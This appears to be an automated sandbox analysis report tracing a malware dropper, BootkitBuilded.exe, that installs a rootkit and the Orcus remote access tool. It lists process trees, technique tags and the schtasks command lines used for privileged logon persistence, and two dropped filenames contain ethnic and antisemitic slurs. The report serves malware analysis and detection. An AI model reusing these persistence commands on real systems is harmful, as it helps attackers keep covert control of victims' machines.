
description	pid	Process	procid_target
PID 3024 wrote to memory of 3136	3024	BootkitBuilded.exe	87
PID 3024 wrote to memory of 3136	3024	BootkitBuilded.exe	87
PID 3024 wrote to memory of 3136	3024	BootkitBuilded.exe	87
PID 3024 wrote to memory of 2836	3024	BootkitBuilded.exe	88
PID 3024 wrote to memory of 2836	3024	BootkitBuilded.exe	88
PID 3024 wrote to memory of 5040	3024	BootkitBuilded.exe	89
PID 3024 wrote to memory of 5040	3024	BootkitBuilded.exe	89
PID 3024 wrote to memory of 5040	3024	BootkitBuilded.exe	89
PID 1560 wrote to memory of 556	1560	cmd.exe	91
PID 1560 wrote to memory of 556	1560	cmd.exe	91
PID 2836 wrote to memory of 4776	2836	$77nigga.exe	93
PID 2836 wrote to memory of 4776	2836	$77nigga.exe	93
PID 5040 wrote to memory of 3164	5040	jew.exe	95
PID 5040 wrote to memory of 3164	5040	jew.exe	95
PID 5040 wrote to memory of 3164	5040	jew.exe	95
PID 2836 wrote to memory of 2352	2836	$77nigga.exe	98
PID 2836 wrote to memory of 2352	2836	$77nigga.exe	98
PID 556 wrote to memory of 624	556	powershell.exe	5
PID 624 wrote to memory of 676	624	winlogon.exe	7
PID 624 wrote to memory of 960	624	winlogon.exe	12
PID 624 wrote to memory of 344	624	winlogon.exe	13
PID 624 wrote to memory of 416	624	winlogon.exe	14
PID 676 wrote to memory of 2820	676	lsass.exe	46
PID 624 wrote to memory of 768	624	winlogon.exe	15
PID 624 wrote to memory of 1068	624	winlogon.exe	16
PID 624 wrote to memory of 1076	624	winlogon.exe	17
PID 624 wrote to memory of 1148	624	winlogon.exe	18
PID 624 wrote to memory of 1208	624	winlogon.exe	19
PID 624 wrote to memory of 1296	624	winlogon.exe	21
PID 676 wrote to memory of 3164	676	lsass.exe	95
PID 676 wrote to memory of 3164	676	lsass.exe	95
PID 676 wrote to memory of 3164	676	lsass.exe	95
PID 676 wrote to memory of 3164	676	lsass.exe	95
PID 676 wrote to memory of 3164	676	lsass.exe	95
PID 676 wrote to memory of 3164	676	lsass.exe	95
PID 676 wrote to memory of 3164	676	lsass.exe	95
PID 676 wrote to memory of 3164	676	lsass.exe	95
PID 676 wrote to memory of 3164	676	lsass.exe	95
PID 676 wrote to memory of 3164	676	lsass.exe	95
PID 624 wrote to memory of 1308	624	winlogon.exe	22
PID 624 wrote to memory of 1320	624	winlogon.exe	23
PID 624 wrote to memory of 1352	624	winlogon.exe	24
PID 624 wrote to memory of 1416	624	winlogon.exe	25
PID 624 wrote to memory of 1512	624	winlogon.exe	26
PID 624 wrote to memory of 1548	624	winlogon.exe	27
PID 3164 wrote to memory of 4276	3164	Orcus.exe	100
PID 3164 wrote to memory of 4276	3164	Orcus.exe	100
PID 3164 wrote to memory of 4276	3164	Orcus.exe	100
PID 676 wrote to memory of 2820	676	lsass.exe	46
PID 624 wrote to memory of 1580	624	winlogon.exe	28
PID 624 wrote to memory of 1652	624	winlogon.exe	29
PID 624 wrote to memory of 1684	624	winlogon.exe	30
PID 624 wrote to memory of 1808	624	winlogon.exe	31
PID 624 wrote to memory of 1832	624	winlogon.exe	32
PID 676 wrote to memory of 2820	676	lsass.exe	46
PID 624 wrote to memory of 2024	624	winlogon.exe	33
PID 2352 wrote to memory of 4684	2352	notfud.exe	102
PID 2352 wrote to memory of 4684	2352	notfud.exe	102
PID 1620 wrote to memory of 4716	1620	cmd.exe	103
PID 1620 wrote to memory of 4716	1620	cmd.exe	103
PID 1620 wrote to memory of 4716	1620	cmd.exe	103
PID 624 wrote to memory of 1060	624	winlogon.exe	34
PID 676 wrote to memory of 2820	676	lsass.exe	46
PID 676 wrote to memory of 2820	676	lsass.exe	46

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:624
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1076

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:344

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:768

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:1148

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1308

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1416
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3328
- C:\Program Files (x86)\Orcus\Orcus.exe
  "C:\Program Files (x86)\Orcus\Orcus.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1548

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1580
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  - Modifies registry class
  PID:3056

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1652

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1684

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1060

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2132

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2292

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2416

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Modifies data under HKEY_USERS
PID:2764

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Enumerates connected drives
PID:2828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2868

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3568

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3648
- C:\Users\Admin\AppData\Local\Temp\BootkitBuilded.exe
  "C:\Users\Admin\AppData\Local\Temp\BootkitBuilded.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3024
- - C:\Users\Admin\AppData\Local\Temp\Install.exe
    "C:\Users\Admin\AppData\Local\Temp\Install.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3136
- - C:\Users\Admin\AppData\Local\Temp\$77nigga.exe
    "C:\Users\Admin\AppData\Local\Temp\$77nigga.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2836
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "notfud" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\notfud\notfud.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4776
  - - C:\Users\Admin\AppData\Roaming\notfud\notfud.exe
      "C:\Users\Admin\AppData\Roaming\notfud\notfud.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: AddClipboardFormatListener
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2352
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "notfud" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\notfud\notfud.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4684
- - C:\Users\Admin\AppData\Local\Temp\jew.exe
    "C:\Users\Admin\AppData\Local\Temp\jew.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5040
  - - C:\Program Files (x86)\Orcus\Orcus.exe
      "C:\Program Files (x86)\Orcus\Orcus.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:3164
    - - C:\Users\Admin\AppData\Roaming\OrcusWatchdog.exe
        
        "C:\Users\Admin\AppData\Roaming\OrcusWatchdog.exe" /launchSelfAndExit "C:\Program Files (x86)\Orcus\Orcus.exe" 3164 /protectFile
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4276
      - C:\Users\Admin\AppData\Roaming\OrcusWatchdog.exe
        
        "C:\Users\Admin\AppData\Roaming\OrcusWatchdog.exe" /watchProcess "C:\Program Files (x86)\Orcus\Orcus.exe" 3164 "/protectFile"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Orcus\Orcus.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1620
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of FindShellTrayWindow
    PID:3976
- - C:\Program Files (x86)\Orcus\Orcus.exe
    "C:\Program Files (x86)\Orcus\Orcus.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\UseCheckpoint.mhtml
  2⤵
  - Drops file in Windows directory
  - Checks processor information in registry
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  PID:3560
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2f8,0x2fc,0x300,0x2f4,0x340,0x7ffdd714f208,0x7ffdd714f214,0x7ffdd714f220
    3⤵
    PID:1556
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1780,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=2280 /prefetch:3
    3⤵
    PID:2816
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2240,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:2
    3⤵
    PID:4348
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2428,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=2288 /prefetch:8
    3⤵
    PID:820
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3552,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=3564 /prefetch:1
    3⤵
    PID:4792
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3568,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:1
    3⤵
    PID:1360
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4196,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=4216 /prefetch:1
    3⤵
    PID:5144
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4232,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=4268 /prefetch:2
    3⤵
    PID:5152
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=3600,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=3748 /prefetch:1
    3⤵
    PID:5336
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5428,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=5392 /prefetch:8
    3⤵
    PID:5716
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5552,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=5564 /prefetch:8
    3⤵
    PID:5840
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3832,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=3648 /prefetch:8
    3⤵
    PID:5712
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3820,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=3836 /prefetch:8
    3⤵
    PID:5668
- - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5984,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=6000 /prefetch:8
    3⤵
    PID:5940
- - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5984,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=6000 /prefetch:8
    3⤵
    PID:6116
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6128,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=6136 /prefetch:8
    3⤵
    PID:5696
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6132,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=6296 /prefetch:8
    3⤵
    PID:5188
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6204,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=6296 /prefetch:8
    3⤵
    PID:5988
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6336,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=6400 /prefetch:8
    3⤵
    PID:5908
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6640,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=6652 /prefetch:8
    3⤵
    PID:5468
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6820,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=6828 /prefetch:8
    3⤵
    PID:6096
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5792,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=6672 /prefetch:8
    3⤵
    PID:5736
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6800,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=6988 /prefetch:8
    3⤵
    PID:2484
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
    3⤵
    - Drops file in Windows directory
    - Checks processor information in registry
    - Enumerates system info in registry
    - Modifies registry class
    PID:4376
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x288,0x28c,0x290,0x284,0x314,0x7ffdd714f208,0x7ffdd714f214,0x7ffdd714f220
      4⤵
      PID:5732
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1816,i,7321739983954352582,9057690226603493158,262144 --variations-seed-version --mojo-platform-channel-handle=2204 /prefetch:3
      4⤵
      PID:5628
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2168,i,7321739983954352582,9057690226603493158,262144 --variations-seed-version --mojo-platform-channel-handle=2164 /prefetch:2
      4⤵
      PID:5548
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2508,i,7321739983954352582,9057690226603493158,262144 --variations-seed-version --mojo-platform-channel-handle=2456 /prefetch:8
      4⤵
      PID:4220
  - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4300,i,7321739983954352582,9057690226603493158,262144 --variations-seed-version --mojo-platform-channel-handle=4324 /prefetch:8
      4⤵
      PID:5168
  - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4300,i,7321739983954352582,9057690226603493158,262144 --variations-seed-version --mojo-platform-channel-handle=4324 /prefetch:8
      4⤵
      PID:5236
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4540,i,7321739983954352582,9057690226603493158,262144 --variations-seed-version --mojo-platform-channel-handle=4464 /prefetch:8
      4⤵
      PID:4332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
  2⤵
  PID:1204
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1472
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
    3⤵
    PID:5560
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
